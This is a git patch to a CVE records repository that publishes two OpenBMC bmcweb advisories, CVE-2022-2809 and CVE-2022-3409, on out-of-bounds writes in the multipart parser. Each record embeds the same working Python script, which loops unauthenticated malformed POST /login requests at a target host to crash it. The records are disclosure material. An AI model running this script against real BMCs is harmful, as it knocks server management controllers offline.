From efed51b48f042c6ac930e8c33a9f7cf3c6714eed Mon Sep 17 00:00:00 2001 From: JamesMihm Date: Fri, 7 Oct 2022 11:11:44 -0700 Subject: [PATCH] Updates for two OpenBMC CVE Reports --- 2022/2xxx/CVE-2022-2809.json | 122 +++++++++++++++++++++++++++++++++-- 2022/3xxx/CVE-2022-3409.json | 122 +++++++++++++++++++++++++++++++++-- 2 files changed, 232 insertions(+), 12 deletions(-) diff --git a/2022/2xxx/CVE-2022-2809.json b/2022/2xxx/CVE-2022-2809.json index c9fa8929d57..732162362dc 100644 --- a/2022/2xxx/CVE-2022-2809.json +++ b/2022/2xxx/CVE-2022-2809.json @@ -1,18 +1,128 @@ { - "data_type": "CVE", - "data_format": "MITRE", - "data_version": "4.0", "CVE_data_meta": { + "ASSIGNER": "James.Mihm@Intel.com", + "DATE_PUBLIC": "2022-10-07T19:00:00.000Z", "ID": "CVE-2022-2809", - "ASSIGNER": "cve@mitre.org", - "STATE": "RESERVED" + "STATE": "RESERVED", + "TITLE": "Unauthenticated out of bounds heap write in bmcweb" }, + "affects": { + "vendor": { + "vendor_data": [ + { + "product": { + "product_data": [ + { + "product_name": "OpenBMC", + "version": { + "version_data": [ + { + "version_affected": ">=", + "version_name": "Release", + "version_value": "2.10" + }, + { + "version_affected": "<=", + "version_name": "Release", + "version_value": "2.12" + }, + { + "version_affected": "!>=", + "version_name": "Release", + "version_value": "2.13" + } + ] + } + } + ] + }, + "vendor_name": "OpenBMC Project" + } + ] + } + }, + "credit": [ + { + "lang": "eng", + "value": "Finder: Jakub Rozanski, Intel Corporation" + }, + { + "lang": "eng", + "value": "Remediation: Krzysztof Grobelny, Intel Corporation" + } + ], + "data_format": "MITRE", + "data_type": "CVE", + "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", - "value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided." + "value": "A vulnerability in bmcweb of OpenBMC Project allows user to cause denial of service.\n\nWhen fuzzing the multipart_parser code using AFL++ with address sanitizer enabled to find smallest memory corruptions possible. It detected problem in how multipart_parser handles unclosed http headers. If long enough http header is passed in the multipart form without colon there is one byte overwrite on heap. It can be conducted multiple times in a loop to cause DoS." } ] + }, + "exploit": [ + { + "lang": "eng", + "value": "import socket\nimport ssl\nimport time\n\nHOST = \"\" # PROVIDE HOSTNAME or IP ADDRESS OF TARGET BMCWEB\nPORT = 443\n\nlength = 322\nadditional = \"\"\n\npayload = \"\"\"POST /login HTTP/1.1\\r\\nHost: :8080\\r\\nUser-Agent: curl/7.58.0\\r\\nAccept: */*\\r\\nContent-Length: %s\\r\\nContent-Type: multipart/form-data; boundary=---------------------------d74496d66958873e\\r\\n\\r\\n-----------------------------d74496d66958873e\\r\\nt-DiPpcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccgccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc%s\\r\\n\\r\\n\"\"\"\n\nif __name__ == \"__main__\":\n\n while(True):\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n client = ssl.wrap_socket(client, cert_reqs=ssl.CERT_NONE)\n\n client.connect((HOST, PORT))\n toSend = payload % (str(length), additional)\n print(toSend)\n client.send(toSend.encode('utf-8'))\n print(client.recv(4096))\n client.close()\n time.sleep(0.01)\n length += 1\n additional += \"a\"\n" + } + ], + "generator": { + "engine": "Vulnogram 0.0.9" + }, + "impact": { + "cvss": { + "attackComplexity": "LOW", + "attackVector": "NETWORK", + "availabilityImpact": "HIGH", + "baseScore": 8.2, + "baseSeverity": "HIGH", + "confidentialityImpact": "NONE", + "integrityImpact": "LOW", + "privilegesRequired": "NONE", + "scope": "UNCHANGED", + "userInteraction": "NONE", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", + "version": "3.1" + } + }, + "problemtype": { + "problemtype_data": [ + { + "description": [ + { + "lang": "eng", + "value": "CWE-229: Improper Handling of Values" + } + ] + }, + { + "description": [ + { + "lang": "eng", + "value": "CWE-122: Heap-based Buffer Overflow" + } + ] + } + ] + }, + "references": { + "reference_data": [ + { + "name": "https://github.com/openbmc/bmcweb", + "refsource": "CONFIRM", + "url": "https://github.com/openbmc/bmcweb" + } + ] + }, + "solution": [ + { + "lang": "eng", + "value": "https://gerrit.openbmc.org/c/openbmc/bmcweb/+/56796" + } + ], + "source": { + "discovery": "INTERNAL" } } \ No newline at end of file diff --git a/2022/3xxx/CVE-2022-3409.json b/2022/3xxx/CVE-2022-3409.json index 74fbffa4e96..b3f9eb2b555 100644 --- a/2022/3xxx/CVE-2022-3409.json +++ b/2022/3xxx/CVE-2022-3409.json @@ -1,18 +1,128 @@ { - "data_type": "CVE", - "data_format": "MITRE", - "data_version": "4.0", "CVE_data_meta": { + "ASSIGNER": "James.Mihm@Intel.com", + "DATE_PUBLIC": "2022-10-07T19:00:00.000Z", "ID": "CVE-2022-3409", - "ASSIGNER": "cve@mitre.org", - "STATE": "RESERVED" + "STATE": "RESERVED", + "TITLE": "Unauthenticated out of bounds stack write in bmcweb" }, + "affects": { + "vendor": { + "vendor_data": [ + { + "product": { + "product_data": [ + { + "product_name": "OpenBMC", + "version": { + "version_data": [ + { + "version_affected": ">=", + "version_name": "Release", + "version_value": "2.10" + }, + { + "version_affected": "<=", + "version_name": "Release", + "version_value": "2.12" + }, + { + "version_affected": "!>=", + "version_name": "Release", + "version_value": "2.13" + } + ] + } + } + ] + }, + "vendor_name": "OpenBMC Project" + } + ] + } + }, + "credit": [ + { + "lang": "eng", + "value": "Finder: Jakub Rozanski, Intel Corporation" + }, + { + "lang": "eng", + "value": "Remediation: Krzysztof Grobelny, Intel Corporation" + } + ], + "data_format": "MITRE", + "data_type": "CVE", + "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", - "value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided." + "value": "A vulnerability in bmcweb of OpenBMC Project allows user to cause denial of service.\n\nThis vulnerability was identified during mitigation for CVE-2022-2809.\n \nWhen fuzzing the multipart_parser code using AFL++ with address sanitizer enabled to find smallest memory corruptions possible. It detected problem in how multipart_parser handles unclosed http headers. If long enough http header is passed in the multipart form without colon there is one byte overwrite on heap. It can be conducted multiple times in a loop to cause DoS. " } ] + }, + "exploit": [ + { + "lang": "eng", + "value": "import socket\nimport ssl\nimport time\n\nHOST = \"\" # PROVIDE HOSTNAME or IP ADDRESS OF TARGET BMCWEB\nPORT = 443\n\nlength = 322\nadditional = \"\"\n\npayload = \"\"\"POST /login HTTP/1.1\\r\\nHost: :8080\\r\\nUser-Agent: curl/7.58.0\\r\\nAccept: */*\\r\\nContent-Length: %s\\r\\nContent-Type: multipart/form-data; boundary=---------------------------d74496d66958873e\\r\\n\\r\\n-----------------------------d74496d66958873e\\r\\nt-DiPpcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccgccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc%s\\r\\n\\r\\n\"\"\"\n\nif __name__ == \"__main__\":\n\n while(True):\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n client = ssl.wrap_socket(client, cert_reqs=ssl.CERT_NONE)\n\n client.connect((HOST, PORT))\n toSend = payload % (str(length), additional)\n print(toSend)\n client.send(toSend.encode('utf-8'))\n print(client.recv(4096))\n client.close()\n time.sleep(0.01)\n length += 1\n additional += \"a\"\n" + } + ], + "generator": { + "engine": "Vulnogram 0.0.9" + }, + "impact": { + "cvss": { + "attackComplexity": "LOW", + "attackVector": "NETWORK", + "availabilityImpact": "HIGH", + "baseScore": 8.2, + "baseSeverity": "HIGH", + "confidentialityImpact": "NONE", + "integrityImpact": "LOW", + "privilegesRequired": "NONE", + "scope": "UNCHANGED", + "userInteraction": "NONE", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", + "version": "3.1" + } + }, + "problemtype": { + "problemtype_data": [ + { + "description": [ + { + "lang": "eng", + "value": "CWE-121: Stack-based Buffer Overflow" + } + ] + }, + { + "description": [ + { + "lang": "eng", + "value": "CWE-229: Improper Handling of Values" + } + ] + } + ] + }, + "references": { + "reference_data": [ + { + "name": "https://github.com/openbmc/bmcweb", + "refsource": "CONFIRM", + "url": "https://github.com/openbmc/bmcweb" + } + ] + }, + "solution": [ + { + "lang": "eng", + "value": "https://gerrit.openbmc.org/c/openbmc/bmcweb/+/56868" + } + ], + "source": { + "discovery": "INTERNAL" } } \ No newline at end of file